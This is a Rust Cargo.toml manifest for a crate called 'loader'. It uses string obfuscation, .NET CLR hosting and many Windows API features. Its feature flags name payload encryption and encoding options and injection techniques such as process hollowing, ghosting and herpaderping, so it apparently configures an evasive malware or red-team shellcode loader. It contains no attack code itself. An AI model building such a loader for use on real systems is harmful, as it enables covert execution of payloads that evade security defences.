[package]
name = "loader"
version = "0.1.0"
edition = "2024"

[lib]
# Crate type for DLL builds
crate-type = ["cdylib"]
path = "src/lib.rs"

[[bin]]
# Define the binary for non-DLL builds
name = "loader"
path = "src/main.rs"

[dependencies]
shared = { workspace = true, optional = true }
obfstr = "0.3.0"
# memoffset = "0.6"
# widestring = "0.5.1"
ntapi = { version = "0.4.1", default-features = false }
sysinfo = { version = "0.32.0", default-features = false }
clroxide = "1.1.1"
widestring = "1.2.0"

[dependencies.windows-sys]
version = "0.45.0"
default-features = false
features = [
    "Win32_Foundation",
    "Win32_System_Threading",
    "Win32_UI_WindowsAndMessaging",
    "Win32_UI_Shell",
    "Win32_System_Memory",
    "Win32_System_Diagnostics_Debug",
    "Win32_System_SystemServices",
    "Win32_System_WindowsProgramming",
    "Win32_System_LibraryLoader",
    "Win32_NetworkManagement_IpHelper",
    "Win32_Networking_WinSock",
    "Win32_System_SystemInformation",
    "Win32_System_Environment",
    "Win32_System_ProcessStatus",
    "Win32_Globalization",
    "Win32_System_Diagnostics_ToolHelp",
    "Win32_System_Kernel",
    "Win32_System_Pipes",
    "Win32_Storage_FileSystem",
    "Win32_System_IO",
    "Win32_System_Console",
    "Win32_Networking_ActiveDirectory",
    "Win32_Security_Authentication_Identity",
]

[build-dependencies]
embed-resource = "3.0.1"

[features]
dll = []
dll_main = []
resource = []

rc4 = ["shared"]
chacha20 = ["shared"]
xor = ["shared"]

ipv4 = ["shared"]
ipv6 = ["shared"]
mac = ["shared"]
uuid = ["shared"]

shellcode_direct = []
shellcode_hypnosis = []
shellcode_processhollowing = []
pe_manualmap = []
pe_processhollowing = []
pe_processghosting = []
pe_ghostlyhollowing = []
pe_processherpaderping = []
pe_herpaderplyhollowing = []

debug = []
